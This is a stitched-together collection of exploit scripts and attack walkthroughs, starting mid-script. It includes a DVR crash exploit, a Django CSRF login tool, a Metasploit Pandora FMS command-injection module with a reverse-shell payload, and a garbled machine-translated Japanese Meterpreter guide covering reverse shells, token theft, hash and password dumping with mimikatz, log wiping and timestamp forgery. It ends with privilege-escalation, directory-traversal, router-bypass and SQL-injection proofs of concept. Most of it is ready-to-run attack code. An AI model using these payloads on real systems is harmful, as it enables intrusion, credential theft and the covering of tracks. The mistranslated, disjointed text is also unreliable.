random_hash = md5.new(args.username + ":" + random + ":" +
realm_hash).hexdigest().upper()
sofia_result = sofia_hash(args.password)
final_hash = md5.new(args.username + ":" + random + ":" +
sofia_result).hexdigest().upper()
challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x05\x02\x00\x08\x00\x00\xa1\xaa" +
args.username + "&&" + random_hash + final_hash)
sock.sendall(challenge_resp)
(success, header, payload) = recv_response(sock)
if success == False or not header:
print 'Failed to receive the session id'
sys.exit(0)
session_id_bin = header[16:20]
session_id_int = struct.unpack_from('I', session_id_bin)
if session_id_int[0] == 0:
print "Log in failed."
sys.exit(0)
session_id = session_id_int[0]
print "[+] Session ID: " + str(session_id)
# firmware version
command = "Protocol: " + ("a" * 0x300) + "\r\n"
command_length = struct.pack("I", len(command))
firmware = ("\x62\x00\x00\x00" + command_length +
"\x04\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
command)
sock.sendall(firmware)
(success, header, firmware_string) = recv_response(sock)
if success == False and not header:
print "[!] Probably crashed the server."
else:
print "[+] Attack failed."
# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass
# Date: 2020-04-08
# Exploit Author: Spad Security Group
# Vendor Homepage: https://www.djangoproject.com/
# Software Link: https://pypi.org/project/Django/
# Version: 3.0 =<
# Tested on: windows 10
# Language: python3.8
# t.me/SpadSec
# Spad Security Group
from requests import Session
import sys
from bs4 import BeautifulSoup
from time import sleep
from colorama import Fore, Style
from random import choice
from os import name, system
colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW]
def cleaner():
if name == "nt":
system("cls")
else:
system("clear")
def logo_printer():
cleaner()
logo = r"""
\_______/
`.,-'\_____/`-.,'
/`..'\ _ /`.,'\
/ /`.,' `.,'\ \
/__/__/ \__\__\__
\ \ \ / / /
\ \,'`._,'`./ /
\,'`./___\,'`./
,'`-./_____\,-'`.
/ \
"""
_logo_enumer = 0
for char in logo:
sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}")
sys.stdout.flush()
_logo_enumer +=1
sleep(0.005)
print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec")
class DjangoCsrfMiddleWareBypass:
def __init__(self, url: str, username: str, password: str):
self.url = url
self.username = username
self.password = password
logo_printer()
self.cookies = {}
self.session = Session()
self.bypass()
def spad_printer(self, string):
print("\n")
for char in string:
sys.stdout.write(char)
sys.stdout.flush()
sleep(0.05)
def bypass(self):
global colors
_conn = self.session.get(self.url)
self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}")
self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...")
for key, value in _conn.cookies.items():
self.cookies[key] = value
self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!")
soup = BeautifulSoup(_conn.text, "lxml")
csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']
self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}")
login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies)
if len(login.history) >= 2:
if login.history[1].is_redirect:
self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in")
else:
self.spad_printer("[-] Error")
else:
if login.history:
if login.history[0].is_redirect:
self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}")
for key, value in self.session.cookies.items():
self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}")
else:
self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")
else:
self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")
if __name__ == "__main__":
try:
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
DjangoCsrfMiddleWareBypass(url, username, password)
except IndexError:
logo_printer()
for char in f"[!] python {sys.argv[0]} http://google.com username password":
sys.stdout.write(char)
sys.stdout.flush()
sleep(0.05)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Pandora FMS Ping Authenticated Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability found in Pandora FMS 7.0NG and lower.
net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute arbitrary OS commands.
},
'Author' =>
[
'Onur ER <onur@onurer.net>' # Vulnerability discovery and Metasploit module
],
'DisclosureDate' => '2020-03-09',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' =>
[
['Automatic Target', {}]
],
'DefaultOptions' =>
{
'Payload' => 'linux/x86/meterpreter/reverse_tcp'
},
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
OptString.new('USERNAME', [true, 'The username to authenticate with']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
]
)
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, 'index.php')
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.body =~ /Pandora/i
return CheckCode::Safe
end
pandora_version = res.body.scan(/<div id="ver_num">v(.*?)<\/div>/).flatten.first
version = Gem::Version.new(pandora_version)
print_status("Pandora FMS version #{version}") if version
if Gem::Version.new(version) <= Gem::Version.new('7.0NG')
return Exploit::CheckCode::Appears
end
CheckCode::Detected
end
def authenticate
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'index.php'),
'vars_get' => {
'login' => '1'
},
'vars_post' => {
'nick' => datastore['USERNAME'],
'pass' => datastore['PASSWORD'],
'login_button' => 'Login'
}
})
return auth_succeeded?(res)
end
def auth_succeeded?(res)
unless res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
print_error('Authentication failed!')
return false
end
print_good('Successfully authenticated')
print_status('Attempting to retrieve session cookie')
@cookie = res.get_cookies
unless @cookie.include?('PHPSESSID')
print_error('Error retrieving cookie!')
return false
end
print_good("Successfully retrieved session cookie: #{@cookie}")
true
end
def exploit
print_status('Exploiting...')
execute_cmdstager(flavor: :wget, nospace: true)
end
def execute_command(cmd, opts = {})
print_status("Attempting to authenticate using (#{datastore['USERNAME']}:#{datastore['PASSWORD']})")
auth = authenticate
unless auth
fail_with Failure::NoAccess, 'Please provide a valid username and password.'
end
id_agente = 1
while !session_created? && id_agente <= 10
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'index.php'),
'cookie' => @cookie,
'vars_get' => {
'sec' => 'estado',
'sec2' => 'operation/agentes/ver_agente',
'tab' => 'extension',
'id_agente' => "#{id_agente}",
'id_extension' => 'network_tools'
},
'vars_post' => {
'operation' => '2',
'select_ips' => ";#{cmd}",
'community' => 'public',
'submit' => 'Execute'
}
})
id_agente += 1
end
end
end
0x01メートルプレター自動特権レイズ
1。バックドアプログラムを生成します
KALIのコマンドラインの下で次のコマンドを直接実行して、Windows用のリバウンドトロイの木馬を取得します。
MSFVENOM -P Windows/MeterPreter/Reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exeここでは、生成されたトロイの木馬のペイロードを:に指定します。
Windows/MeterPreter/Reverse_tcp、跳ね返るモニター側のアドレスは172.16.11.2、リスニングポートは4444、ファイル出力形式はexeであり、path /tmp/hack.exeに保存されます
2。リスニングを実行
使用
Exploit/Multi/Handler
ペイロードを設定します
Windows/MeterPreter/Reverse_tcp
lhostを設定します
172.16.11.2
オプションを表示します
リスニング用に構成したモジュールを有効にするために、エクスプロイトコマンドを入力してください。
3。 Trojan
をアップロードして実行しますがアップロードされ、スクリプトトロイの木馬を実行します。ここでは、一連の貫通テストを通じてターゲットマシンのウェブシェルを取得したと仮定します。スクリプトTrojanのファイル管理機能を介して上記のTrojan Hack.exeを正常にアップロードしました。プログラムの絶対的なパスは次のとおりです。
c: \ www \ hack.exe次に、スクリプトトロイの木馬のコマンド実行関数を介して上記のトロイの木馬を実行しようとします。
C: //www/hack.exe/キャラクターの逃亡を避けるために、私たちは//ここでパスを使用します
次に、実行後、トロイの木馬が表示されているように表示されていることがわかります。以前に聞いたメタプロイトコマンドラインウィンドウに切り替えて、ターゲットマシンが接続していることがわかります。
4。
MeterPreter Basicライセンスメータープレーターはです
Metasploitフレームワークのキラー武器は、通常、脆弱性のオーバーフロー後の攻撃として使用されます。攻撃は、脆弱性が開始された後、コントロールチャネルに戻ることができます。次に、MeterPreterセッションを使用して自動特権昇格操作を実行し、次のコマンドを直接実行すると、MSFは適切な方法を自動的に選択して現在の許可を増やします。
GetSystem
上記の返品は、MeterPreterセッションの自動特権提起が成功することを意味します。この時点で、ターゲットマシンがドメイン環境に属し、ドメイン管理者によって実行されるプロセスがある場合、指定されたプロセスPIDからドメイン管理者グループトークンを盗み、興味深いことを行うことができます(ドメインアカウントの追加やドメイン管理者グループへのドメインアカウントの追加など)。 MeterPreterセッションでは、PSコマンドを実行してターゲットマシンの現在のプロセスを表示します。ここでプロセスが表示され、実行中のアカウントがドメイン管理者であると仮定します。最初の列で対応するプロセスPIDを見つけることができます(実際、システムアカウントで実行されているプロセスを見つけます)。 PIDは2584:
です。次のステートメントを実行して、ユーザープロセスのトークンを盗むことができます。
Steel_token 2584
この方法は通常、ドメイン管理者のトークンを盗むために使用され、それを実行します
GetUIDは、システムユーザーが成功したと呼ばれていることがわかります:
は既にシステムの許可であるため、次のコマンドを実行して、SAMデータベースからパスワードのハッシュ値をエクスポートしようとします。
2008年に、GetSystemコマンドとHashdumpコマンドが例外をスローする場合、システムシステムの許可を使用して実行されるプロセスに移行する必要があります。後で紹介します。次のシェルコマンドを実行して、メータープレターセッションインターフェイスでCMDシェルを使用します。
このCMDSHELLは、もちろん、継承されたメータープレーターセッションのシステム許可です。次のCMDコマンドを実行して、ターゲットマシンにアカウントテストを追加しようとします。
ネットユーザーテスト
v5est0r /add
ネットローカルグループ管理者のテスト /追加
次に、MeterPreterセッションを使用して、ターゲットマシンのリモートデスクトップサービスの3398ポートを開きます(このモジュールは、実際のテストに従ってWindows 2003ホストのみをサポートします):
getgui -eを実行します
最後に、新しい端末ウィンドウを作成し、次のコマンドを実行してrdesktopを呼び出してターゲットマシンのリモートデスクトップに接続します。
rdesktop -u
test -P V5est0r 172.16.12.2.2 -U: Make Username -P:パスワードを指定
0x02
オーバーフロー脆弱性モジュールのエスカレーション
一般的に、Webシェルに対応するWebサービスの権限は非常に低く、一般的にユーザーの許可ですが、実行後にシステムに直接最も高いアクセス許可を持つサーバーにも遭遇しています。この場合、ユーザーは通常直接追加されます。権限が低い場合は、システムの権利にアップグレードする必要があります - Windowsの最高の権限。ハッカーは通常、EXPプログラムを使用して権利を引き上げます。これは、その後の実験で紹介します。もちろん、MSFに基づく権利を高めるためにOverflowの脆弱性モジュールを呼び出すことも良い方法です。バッファオーバーフロー:バッファーは、プログラムを実行するためにユーザーがコンピューターに適用する連続メモリであり、特定のタイプのデータを保存します。バッファオーバーフローとは、一般的で非常に有害なシステム攻撃方法を指します。プログラムのバッファーまでコンテンツを作成することにより、バッファーはオーバーフローし、それによりプログラムのスタックを破壊し、プログラムを回して攻撃の目的を達成するために他の指示を実行します。さらに深刻なことは、バッファオーバーフロー攻撃がリモートネットワーク攻撃の大部分を占めることであり、匿名のインターネットユーザーにホストの一部またはすべての制御を獲得する機会を与えることができます。このタイプの攻撃により、誰もがホストを制御できるようになるため、セキュリティの脅威の非常に深刻なクラスを表しています。
1。
脆弱性モジュールを呼び出すには、上記のMeterPreter自動特権の実験コンテンツを参照して、ターゲットマシンの利用可能なメータープレターセッションを取得してください。次に、MeterPreterセッションで次のコマンドを入力します。
背景
//現在のMeterPreterセッションをバックグラウンド実行に変換します。次に、MSFコマンドラインで次のコマンドを実行して、2015年にMicrosoftの利用可能な脆弱性モジュールを検索します。
検索
MS15 //下の図に示すように、キーワード関連の脆弱性を検索します。多くの脆弱性モジュールが見つかりました。
MS15_051の脆弱性を選択して、権限を増やし、次のコマンドを実行します。
使用
Exploit/Windows/local/ms15_051_client_copy_imageこのアクティブモジュールのエスカレーション操作を実行するためにどのセッションを指定するかを指定する必要があります。次のコマンドを実行して、サービスセッションが1であることを指定します。
セットセッション
1 //今すぐバックドアに接続されるID番号1を設定します。ここには1つのセッションしかありません、そして1に直接接続します
2。
オーバーフローを実行し、次のコマンドを直接実行して、権限を上げるために脆弱なモジュールを呼び出します。
エクスプロイト
返品情報によると、新しいセッションが作成されておらず、システムの許可がアップグレードされたことを思い出させることができます。システムの許可が現在利用できない場合、システムのプロセスに昇格し、プロセスPIDが提供されます。一般的に言えば、特権のエスカレーションが成功したとしても、次のコマンドを実行して接続セッションを返しますが、GetSUID後に元の許可が表示されます。
セッション
-i 1 PSを実行してプロセス
を表示します。プロンプトに従って、上記のPIDのプロセスを見つけました。ここでは、システム権限を備えたプロセスをランダムに見つけました。 PIDは3240です。その後、移行コマンドを使用して、現在のセッションプロセスを指定されたプロセスIDに移行する必要があります
移動します
3240
上記の図に見られるように、プロセスの移行は成功しています。次に、GetUIDを実行して、現在のシステム許可が利用可能であることがわかります。
0x03
その後の権利促進運用1。
Basic Information Collectionは、ターゲットマシンが仮想マシンであるかどうかを検出します。 MeterPreterセッションで次のコマンドを実行します。
走る
投稿/Windows/sghate/checkvm#仮想マシンになるかどうかはここでは正確ではありません。モジュールコードは、メータープレーターのKillavスクリプトを介してターゲットホストが実行しているウイルス対策ソフトウェアを改善する必要があります。 MeterPreterセッションで次のコマンドを実行します。
Killavを実行します
このモジュールを改善する必要があり、ここで殺されたプロセスはCMDです。しかし、時にはそれは便利です。インストールソフトウェア情報を取得するには、MeterPreterセッションで次のコマンドを実行します。
post/windows/gracking/enum_applicationsを実行してください#getインストールソフトウェア情報
ターゲットマシンの最新のファイル操作を取得し、MeterPreterセッションで次のコマンドを実行します。
Post/Windows/Grazgn/Dumplinks#最新のファイル操作を実行します
2。
ハッシュおよびプレーンテキストパスワードを読んで、ターゲットマシンシステムのユーザーハッシュを取得し、メータープレーターセッションで次のコマンドを実行します。
Post/Windows/Gather/smart_hashdumpを実行します
TestInghashesに対するモジュールの実行は次のとおりです
接続されている場合、データベースに保存されます。
JTRパスワードファイル形式
to:/home/croxy/.msf4/loot/20155092922525044_default_10.0.2.15_windows.hashes_407551.txtdumping
パスワードハッシュ.レジストリからハッシュを抽出するシステムとして実行されます
ブートキーを取得.計算
syskey 8c2c8d96e92a8ccfc407a1ca48531239を使用したHbootキー.
ユーザーリストとキーを取得.
ユーザーキーの復号化.ダンピング
パスワードのヒント.
[+] croxy:'whoareyou '
パスワードハッシュのダンプ.
[+]
administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:3:33333333333:
[+]
HomeGroupUser $ :10023360AAD3B435B51404EEAAD3B435B51404EE:E3F0347F8B369CAC49E62A18E34834C033333333:33333333:
[+]
test:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d: As mentioned above, we obtained the hask of the local account and obtained the plaintextパスワード。 Mimikatzモジュールを最初にロードし、MeterPreterセッションで次のコマンドを実行する必要があります。
Mimikatzをロードし、現在のプロセスがシステム許可であることを確認し、次のコマンドを直接実行する必要があります。
MSV
上記の写真に示すように、次の情報が返されます。
[+] MSV資格情報のSystem Retrieの実行上記の返品情報は、現在のプロセスが「システム」の許可であることを示しています。次に、次のコマンドを実行して、システムユーザーのクリアテキストパスワードをエクスポートします。
Kerberosは、下の図に示されています。 Plantextパスワードは正常にエクスポートされ、テストユーザーのパスワードはV5est0r:
次のコマンドを実行して、Mimikatzコマンドラインを介してシステムユーザーハッシュをエクスポートします。
meterpreter mimikatz_command -f
samdump:hases
次のコマンドを実行して、「Mimikatz」コマンドラインを介してシステムユーザーのクリアテキストパスワードをエクスポートします。
mimikatz_command -f sekurlsa:searchpasswords
3。
トレースをきれいにするには、次のコマンドを実行します。
Clearevは、戻るために次のように見ることができます。
MeterPreter Clearev
このモジュールは、アプリケーション、システム、セキュリティモジュールの3つの側面から履歴記録をクリーンアップしていることがわかります。実際、MSFはTimestomp関数モジュールを提供し、ファイル時間を変更しますが、実際のテストはあまり意味がありません。私たちはここで人気のある科学だけをやっています:
MeterPreter Timestomp C: \\ www -c
'09/09/1980 12:12:34 'ファイルの作成時間を変更します
MeterPreter TimeStomp C: \\ jzking121.txt -m '01/01/1991
12:12:34'Modifyファイルの変更時間
MeterPreter TimeStomp C: \\ jzking121.txt -f c: \\ rhdsetup.logコピーrhdsetup.log属性をjzking121にコピーします。実際のテストでは、時折エラーがあります。サーバーにログインして、ファイル時間を手動で変更できます。
0x04
Always Installeevated Rights
1。 MSIインストールファイルを生成
メータープレターセッションを取得した後、いくつかの従来の方法でシステムの許可を取得できないと仮定して、常に平行にされた権利は希望をもたらすかもしれません。
AlwaysInstallevatedは、Microsoftがシステム許可を使用して不正なユーザーがインストールファイル(MSI)を実行できるようにする設定です。ただし、この種の資格に対してこれを権利を与えるには、特定のセキュリティリスクがあります。これがそうすれば、次の2つのレジストリ値が「1」に設定されるためです。
[hkey_current_user \ software \ policies \ microsoft \ windows \ installer]
'Alwaysinstallevated'=dword:00000001
[hkey_local_machine \ software \ policies \ microsoft \ windows \ installer]
「Alwaysinstallevated」=DWORD3:00000001これらの2つの重要な値を照会する最も簡単な方法は、CMDコマンドを使用することです。最初にシェルを実行して、メータープレーターセッションで `cmdshellを切り替えます。CMDSHELLの下で次のコマンドを実行して、上記のレジストリキー値を照会します。
reg
クエリHKCU \ Software \ Policies \ Microsoft \ Windows \ installer /v
常に溶離しています
Reg Query HKLM \ Software \ Policies \ Microsoft \ Windows \ installer /v
常に溶離しています
ここでのクエリは、エラーを報告しています。注:このコマンドエラーが類似している場合:システムは
指定されたレジストリキーまたは値または:エラー:システムは、指定されたレジストリキーまたは値を見つけることができません。これは、常にインストールエレベートがグループポリシーで定義されていないため、関連するレジストリキーがないためかもしれません。 Always Installevatedが有効になっていると仮定したので、MSFvenomツールを使用して、管理者ユーザーをターゲットマシンに追加するMSIインストールファイルを生成できます。
msfvenom
-p Windows/adduser user=msi pass=p@ssword123! -f msi -o /tmp/add.msi
//追加されたユーザーがここで指定され、ユーザー名はMSIで、パスワードは次のとおりです。
上の図に示すように返されるように、MSIファイルは/tmp/add.msiで正常に生成されました
2。 MSIファイルエスカレーションを実行
次に、インストールファイルをターゲットマシンc: \\ add.msi:にアップロードし、次のコマンドを実行します。
アップロード
/tmp/add.msi C: \\ add.msi
新しく生成されたMSIファイルをターゲットマシンに正常にアップロードすると、Windowsコマンドラインmsiexecツールを使用してインストールできます(最初にシェルコマンドを実行して「cmdshellに切り替える必要があります):
シェル
msiexec /quiet /qn /i c: \ add.msi
Msiexecの関連パラメーターについては、次のように説明します。
/cieting:インストール中にユーザーにメッセージを送信します
/QN:はGUIを使用しません
/i:インストールプログラムが実行された後、ターゲットマシンで新しく作成された管理者ユーザーを検出できます。 CMDShellの下で次のコマンドを実行して、管理グループユーザーのリストを表示します。
ネット
ローカルグループ管理者
# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-05-02
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to produce the crash:
# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py
# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard
# 3.- Open AbsoluteTelnet
# 4.- Select "new connection file", "Connection", "SSH1", "Use last username"
# 5.- In "username" field paste Clipboard
# 6.- Select "OK"
# 7.- Crashed
buffer = "\x41" * 1000
f = open ("absolutetelnet_username_SSH1.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Date: 2020-04-10
# Exploit Author: MgThuraMoeMyint
# Vendor Homepage: https://windscribe.com
# Version: v1.83 Build 20
# Tested on: Windows 10, version 1909
In windscribe v1.83 , there is a service via windscribe that every
authenticated user can modify.
C:\Users\mgthura>sc qc WindscribeService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WindscribeService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WindscribeService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
That shows that running as Local System this means that the
BINARY_PATH_NAME parameter can be modified to execute any command on
the system.
I'll change binary_path_name with a command that add a user to
administrators group , so it will be
C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup
administrators pentest /add"
[SC] ChangeServiceConfig SUCCESS
C:\Users\mgthura>sc stop WindscribeService
SERVICE_NAME: WindscribeService
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x4
WAIT_HINT : 0x0
C:\Users\mgthura>sc start WindscribeService
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Restarting service will cause the service to fail as the binary path
would not point into the actual executable of the service.
However the command will be executed successfully and the user will be
added to the local administrators group.
# Exploit Title: TVT NVMS 1000 - Directory Traversal
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085
import sys
import requests
import os
import time
if len(sys.argv) !=4:
print " "
print "Usage : python exploit.py url filename outputname"
print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"
print " "
else:
traversal = "../../../../../../../../../../../../../"
filename = sys.argv[2]
url = sys.argv[1]+traversal+filename
outputname = sys.argv[3]
content = requests.get(url)
if content.status_code == 200:
print " "
print "Directory Traversal Succeeded"
time.sleep(3)
print " "
print "Saving Output"
os.system("touch " + outputname)
output_write = open(outputname,"r+")
output_write.write(content.text)
output_write.close()
else:
print "Host not vulnerable to Directory Traversal!"
# Title: Huawei HG630 2 Router - Authentication Bypass
# Date: 2020-04-13
# Author: Eslam Medhat
# Vendor Homepage: www.huawei.com
# Version: HG630 V2
# HardwareVersion: VER.B
# CVE: N/A
#POC:
The default password of this router is the last 8 characters of the
device's serial number which exist in the back of the device.
An attacker can leak the serial number via the web app API like the
following:
************************Request************************
GET /api/system/deviceinfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie:
SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm
************************Response************************
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Fri, 01 Jan 2010 09:14:47 GMT
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascript
Content-Length: 141
while(1); /*{"DeviceName":"HG630
V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/
You can use that serial number to login to the router.
#Reference:
https://www.youtube.com/watch?v=vOrIL7L_cVc
# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
# Date: 2020-04-10
# Exploit Author: Basim Alabdullah
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Debian8u2
#
# Technical Details:
# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
#
# Impact:
# --------
# Successful exploitation could allow an attacker to obtain sensitive
# information.
import requests
import sys
if len(sys.argv) <2:
print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
sys.exit(-1)
else:
files=sys.argv[2]
url=sys.argv[1]
with requests.session() as s:
urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
response = s.get(urlz, auth=('admin', 'admin'), verify=False)
txt=response.text
print(response.text)
Title: Helpful 2.4.11 Sql Injection - Wordpress Plugin
Version : 2.4.11
Software Link : https://wordpress.org/plugins/helpful/
Date of found: 10.04.2019
Author: Numan Türle
core/Core.class.php
// Ajax requests: pro
add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) );
// set args for insert command
$args = array(
'post_id' => $_REQUEST['post_id'],
'user' => $_REQUEST['user'],
'pro' => $_REQUEST['pro'],
'contra' => $_REQUEST['contra']
);
$result = $this->insert( $args );
@params = 'post_id' => $_REQUEST['post_id'],
call function insert -->
if( !$args['post_id'] ) return false;
$check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id");
Payload :
GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1